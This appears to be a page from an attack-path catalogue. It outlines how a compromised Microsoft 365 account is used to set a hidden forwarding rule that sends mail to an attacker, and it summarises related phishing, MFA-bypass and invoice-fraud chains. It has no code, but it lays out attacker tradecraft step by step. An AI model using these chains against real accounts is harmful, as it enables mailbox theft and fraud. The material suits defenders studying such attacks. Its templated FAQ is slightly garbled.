Mailbox forwarding rule → silent data exfil
Compromised user account. Create an Inbox / transport rule that auto-forwards every incoming message to an external attacker mailbox — invisible until an admin reviews mailbox rules.
§ Context
Assumed environment: attacker has either a session cookie (via AITM) or an OAuth token (via device-code) to a user's M365 mailbox. Tenant has not disabled external forwarding.
§ Steps
- 01Quiet collection of inbound mailInitial AccessT1078— Valid Accounts
- 02Mailbox access via token / cookieInitial AccessT1078— Valid Accounts
- 03Create forwarding rule to attacker mailboxCollectionM365-MAILBOX-FORWARD— Mailbox Forwarding Rule
- 04Optionally batch-exfil via EWS / GraphCollectionM365-EWS-EXFIL— Exchange Web Services (EWS) Exfil
§ References
- T1078Valid Accounts
§ Frequently asked
- What is the "Mailbox forwarding rule → silent data exfil" attack path?
- Compromised user account. Create an Inbox / transport rule that auto-forwards every incoming message to an external attacker mailbox — invisible until an admin reviews mailbox rules. It chains 4 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is Quiet collection of inbound mail (T1078) — a initial access primitive. Assumed environment: attacker has either a session cookie (via AITM) or an OAuth token (via device-code) to a user's M365 mailbox.
- What is the final impact of this kill-chain?
- The final step lands on Optionally batch-exfil via EWS / Graph (M365-EWS-EXFIL), which falls under Collection. From here, an operator typically pivots into post-exploitation or maintains persistence.
- How can defenders detect or prevent this attack?
- Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.
§ Related dossiers
- Shared techniques3
AITM phishing (Evilginx) → M365 session theft → mailbox exfil
Reverse-proxy phishing kit intercepts the entire login flow including MFA. Stolen session cookie → access M365 mailbox / SharePoint without retriggering auth.
- Shared techniques2
FIDO2 caBLE hybrid → phone authenticator hijack
Attacker phishing site shows the legitimate FIDO2 QR. Victim scans with their phone authenticator. The link completes the WebAuthn ceremony in the attacker's browser — they're now signed in as the victim.
- Shared techniques2
Slack token in CI log → DM history → vendor mailbox compromise
A CI run echoed a Slack xoxb-/xoxp- token. Use it to read DMs, harvest password-reset links and vendor invitations, pivot into the corporate mailbox.
- Shared techniques2
Malicious browser extension → cookie harvest → ATO
Publish a useful-looking extension (ad-blocker / PDF reader). It quietly reads cookies + localStorage from sensitive sites and ships them to the attacker.
- Shared techniques2
Compromised CFO mailbox → invoice fraud → wire fraud
AITM phishing nets the CFO's M365 session. Attacker sets a mail rule to hide replies, edits a pending invoice's wire details, sends the modified PDF to AP from the legit mailbox.
- Shared techniques2
MFA fatigue / prompt-bombing → M365 admin compromise
Attacker has the password (from breach / spray) but not MFA. Spam push approvals at 2 AM until the user taps yes out of habit — used in the Uber and 0ktapus breaches.